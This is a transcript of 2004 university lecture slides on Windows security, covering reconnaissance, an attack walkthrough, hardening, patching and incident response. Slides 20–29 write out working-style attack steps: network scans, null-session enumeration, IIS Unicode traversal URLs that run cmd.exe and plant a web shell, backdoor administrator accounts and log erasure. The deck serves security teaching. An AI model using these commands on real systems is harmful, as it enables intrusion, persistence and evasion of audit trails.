Windows Security Analysis

Download Report

Transcript Windows Security Analysis 

Slide 1
Windows Security Analysis
Computer Science E-Commerce Security ‘2004’
Matthew Cook
http://escarpment.net/
1
Slide 2
Introduction
Senior IT Security Specialist
Loughborough University
http://www.lboro.ac.uk/computing/
2
Slide 3
Windows Security Analysis
Introduction
 Step-by-step Machine Compromise
 Preventing Attack
 Incident Response
 Further Reading

3
Slide 4
Introduction
Basic Security Overview
4
Slide 5
Physical Security
Secure Location
 BIOS restrictions
 Password Protection
 Boot Devices
 Case Locks
 Case Panels

5
Slide 6
Security Threats
Denial of Service
 Theft of information
 Modification
 Fabrication (Spoofing or Masquerading)

6
Slide 7
Security Threats…
Why a compromise can occur:
 Physical Security Holes
 Software Security Holes
 Incompatible Usage Security Holes
 Social Engineering
 Complacency
7
Slide 8
The Easiest Security Improvement
Good passwords
 Usernames and Passwords are the primary
security defence

Use a password that is easy to type to avoid
‘Shoulder Surfers’
 Use the first letters from song titles, song
lyrics or film quotations

8
Slide 9
Step-by-step Machine
Compromise
Why, where, how?
9
Slide 10
Background
Reasons for Attack:
Personal Issues
 Political Statement
 Financial Gain (Theft of money, information)
 Learning Experience
 DoS (Denial of Service)
 Support for Illegal Activity

10
Slide 11
Gathering Information
Companies House
 Internet Search

URL: http://www.google.co.uk

Whois
URL: http://www.netsol.com/cgi-bin/whois/whois

A Whois query can provide:
– The Registrant
– The Domain Names Registered
– The Administrative, Technical and Billing Contact
– Record updated and created date stamps
– DNS Servers for the Domain
11
Slide 12
Gathering Information…

Use Nslookup or dig

dig @<dns server> <machine address>

Different query type available:
– A – Network address
– Any – All or Any Information available
– Mx – Mail exchange records
– Soa – Zone of Authority
– Hinfo – Host information
– Axfr – Zone Transfer
– Txt – Additional strings
12
Slide 13
Identifying System Weakness
Many products available:
 Nmap
 Nessus
Pwdump
 L0pht Crack
 Null Authentication

13
Slide 14
Nmap
Port Scanning Tool
 Stealth scanning, OS Fingerprinting
 Open Source
 Runs under Unix based OS
 Port development for Win32
 URL: http://www.insure.org/nmap/

14
Slide 15
Nmap
15
Slide 16
Nessus
Remote security scanner
 Very comprehensive
 Frequently updated modules
 Testing of DoS attacks
 Open Source
 Win32 and Java Client
 URL: http://nessus.org/

16
Slide 17
pwdump
Version 3 (e = encrypted)
 Developed by Phil Staubs and Erik
Hjelmstad
 Based on pwdump and pwdump2
 URL: http://www.ebiz-tech.com/html/pwdump.html
 Needs Administrative Privilidges
 Extracts hashs even if syskey is installed
 Extract from remote machines
 Identifies accounts with no password
 Self contained utility

17
Slide 18
L0pht Crack
Password Auditing and Recovery
 Crack Passwords from many sources
 Registration $249
 URL: http://www.atstake.com/research/lc3/

18
Slide 19
L0pht Crack
Crack Passwords from:
 Local Machine
 Remote Machine
 SAM File
 SMB Sniffer
 PWDump file
19
Slide 20
Nmap Analysis

-
nmap –sP 158.125.0.0/16
Ping scan!
nmap –sS 158.125.0.0/16
- Stealth scan

20
Slide 21
Nmap Analysis…
TCP Connect Scan
 Completes a ‘Three Way Handshake’
 Very noisy (Detection by IDS)

21
Slide 22
Nmap Analysis…
TCP SYN Scan
 Half open scanning (Full port TCP
connection not made)
 Less noisy than the TCP Connect Scan

22
Slide 23
Nmap Analysis…

TCP FIN Scan

TCP Xmas Tree Scan

TCP Null Scan

UDP Scan
– FIN Packet sent to target port
– RST returned for all closed ports
– Mostly works UNIX based TCP/IP Stacks
– Sends a FIN, URG and PUSH packet
– RST returned for all closed ports
– Turns off all flags
– RST returned for all closed ports
– UDP Packet sent to target port
– “ICMP Port Unreachable” for closed ports
23
Slide 24
Null Authentication
Null Authentication:
 Net use \\camford\IPC$ “” /u:“”
 Famous tools like ‘Red Button’
 Net view \\camford
List of Users, groups and shares
 Last logged on date
 Last password change
 Much more…

24
Slide 25
Exploiting the Security Hole

Using IIS Unicode/Directory Traversal
/scripts/../../winnt/system32/cmd.exe /c+dir
 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir


Displays the listing of c: in browser


Copy cmd.exe to /scripts/root.exe
Echo upload.asp
GET /scripts/root.exe /c+echo+[blah]>upload.asp
Upload cmdasp.asp using upload.asp

Still vulnerable on 24% of E-Commerce servers


25
Slide 26
Gaining ‘Root’
Cmdasp.asp provides a cmd shell in the
SYSTEM context
 Increase in privileges is now simple

ISAPI.dll – RevertToSelf (Horovitz)
 Version 2 coded by Foundstone
 http://camford/scripts/idq.dll?
 Patch Bulletin: MS01-26
 NOT included in Windows 2000 SP2

26
Slide 27
Backdoor Access
Create several user accounts
 Net user iisservice <pass> /ADD
 Net localgroup administrators iisservice /ADD
 Add root shells on high end ports
 Tiri is 3Kb in size
 Add backdoors to ‘Run’ registry keys

27
Slide 28
System Alteration
Web page alteration
 Information Theft
 Enable services
 Add VNC

Creating a Warez Server
 Net start msftpsvc
 Check access
 Upload file 1Mb in size
 Advertise as a warez server

28
Slide 29
Audit Trail Removal
Many machines have auditing disabled
 Main problems are IIS logs
 DoS IIS before logs sync to disc
 Erase logs from hard disc
 Erasing Eventlog harder

IDS Systems
 Network Monitoring at firewall

29
Slide 30
Preventing Attack
How to stop the attack from
happening and how to limit the
damage from crackers!
30
Slide 31
NetBIOS/SMB Services
NetBIOS Browsing Request [UDP 137]
 NetBIOS Browsing Response [UDP 138]
 NetBIOS Communications [TCP 135]
 CIFS [TCP 139, 445 UDP 445]
 Port 445 Windows 2000 only
 Block ports at firewall
 Netstat -A

31
Slide 32
NetBIOS/SMB Services…
To disable NetBIOS
1. Select ‘Disable NetBIOS’ in the WINS tab of
advanced TCP/IP properties.
2. Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and Dialup connections’ window
32
Slide 33
NetBIOS/SMB Services…
Disable Null Authentication

HKLM\SYSTEM\CurrentControlSet\Control\LSA\Re
strictAnonymous

REG_DWORD set to 0, 1 or 2!

HKLM\SYSTEM\CurrentControlSet\Control\Secure
PipeServers\RestrictAnonymous

REG_DWORD set to 0 or 1
33
Slide 34
Operating System Patching
Operating Systems do contain bugs, and
patches are a common method of distributing
these fixes.
 A patch or hot fix usually contains a fix for
one discovered bug.
 Service packs contain multiple patches or
hotfixes.

34
Slide 35
Operating System Patching…
Only install patches after you have tested
them in a development environment.
 Only install patches obtained direct from the
vendor.
 Install security patches as soon as possible
after released.
 Install feature patches as and when needed.
 Automate patch collection and installation as
much as possible (QChain).

35
Slide 36
Operating System Patching…
Use automated patching technology:
 SUS – Microsoft Software Update Service
 SMS – Microsoft Systems Management
Server
 Ghost – Symantec imaging software.
And other application deployment software:
 Lights out Distribution
 Deferred installation
36
Slide 37
IPSec
IP security
 Linux Connectivity using FreeS/WAN
 Mainly for wireless use
 WEP encryption cracked
 URL: http://www.freeswan.org/
 URL: http://airsnort.sourceforge.net/

37
Slide 38
Well Known Worms
Nimda
Directory Traversal (Unicode Exploit)
 Slammer
MS SQL Server transaction control
 Blaster
MS Port 135 DCom vulnerabilities
 Sasser
MS Port 445 vulnerabilities

38
Slide 39
Incident Response
What to do when something does
go wrong!
39
Slide 40
Incident Response…
Don’t Panic!
 Unplug the network
 Get a notebook
 Back-up the system and keep the Back-ups
 Restrict use of email
 Look for information
 Investigate the cause


Request help and assistance.
40
Slide 41
Incident Response…

Important to return to service swiftly
– Do not jeopardize security
– If in doubt, re-build
– Perform forensics on a backup
Keep documentation and evidence
 Contact local CERT if investigation proves
non worm/script kiddie activity.

41
Slide 42
Further Reading

Garfinkel, S. Web Security & Commerce
O’Reilly [ISBN 1-56592-269-7]

Hassler, V. Security Fundamentals for E-Commerce
Artech House [ISBN 1-58053-108-3]

Huth, M R A. Secure Communicating Systems
Cambridge Uni Press [ISBN 0-52180-731-X]

Schneier, B. Secrets & Lies (Digital Security in a
Networked World) [ISBN 0-47125-311-1]
42
Slide 43
Useful Books, Tools and URLs
Securing Windows NT/2000 Servers for the
Internet. (Stefan Norberg.)
 Incident Response. (Kenneth R. van Wyk,
Richard Forno.)
 Hacking Exposed: Network Security Secrets
& Solutions. (Stuart McClure et al)
 Hacking Exposed Windows 2000: Network
Security Secrets and Solutions. (Scambray.)

43
Slide 44
Useful Books, Tools and URLs
Microsoft Security Website
http://www.microsoft.com/security/
 Computer Security Incident Response Team
http://www.cert.org/csirts/csirt_faq.html
 JANET CERT
http://www.ja.net/cert/
 Bugtraq Mailing List
http://online.securityfocus.com/

44
Slide 45
Questions
Slides available at:
http://escarpment.net/
45